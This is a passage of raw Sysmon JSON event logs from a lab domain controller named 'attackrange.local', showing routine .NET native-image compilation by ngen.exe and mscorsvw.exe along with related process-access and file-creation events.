C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.652","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-00102FF30A00}","TargetProcessId":"3140","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7342,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:51.777\r\nProcessGuid: {E2A3D6B1-1323-5F25-0000-00102FF30A00}\r\nProcessId: 3140\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c44-0\\Microsoft.GroupPolicy.Management.Interop.dll\r\nCreationUtcTime: 2020-08-01 07:00:51.777","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:51.777","ProcessGuid":"{E2A3D6B1-1323-5F25-0000-00102FF30A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\c44-0\\Microsoft.GroupPolicy.Management.Interop.dll","CreationUtcTime":"2020-08-01 07:00:51.777","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7343,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.793\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001099F60A00}\r\nTargetProcessId: 3500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.793","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001099F60A00}","TargetProcessId":"3500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7344,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.793\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001099F60A00}\r\nTargetProcessId: 3500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.793","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001099F60A00}","TargetProcessId":"3500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7345,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.793\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001099F60A00}\r\nTargetProcessId: 3500\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.793","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001099F60A00}","TargetProcessId":"3500","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7346,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.839\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.839","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7347,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.839\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.839","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:51","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7348,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:51.839\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nTargetProcessId: 2304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:51.839","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","TargetProcessId":"2304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7349,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:51.996\r\nProcessGuid: {E2A3D6B1-1323-5F25-0000-001014FA0A00}\r\nProcessId: 2304\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\900-0\\Microsoft.GroupPolicy.Management.dll\r\nCreationUtcTime: 2020-08-01 07:00:51.996","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:51.996","ProcessGuid":"{E2A3D6B1-1323-5F25-0000-001014FA0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\900-0\\Microsoft.GroupPolicy.Management.dll","CreationUtcTime":"2020-08-01 07:00:51.996","EventReceivedTime":"2020-08-01 07:00:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7350,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.027\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010BAFD0A00}\r\nTargetProcessId: 4444\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscors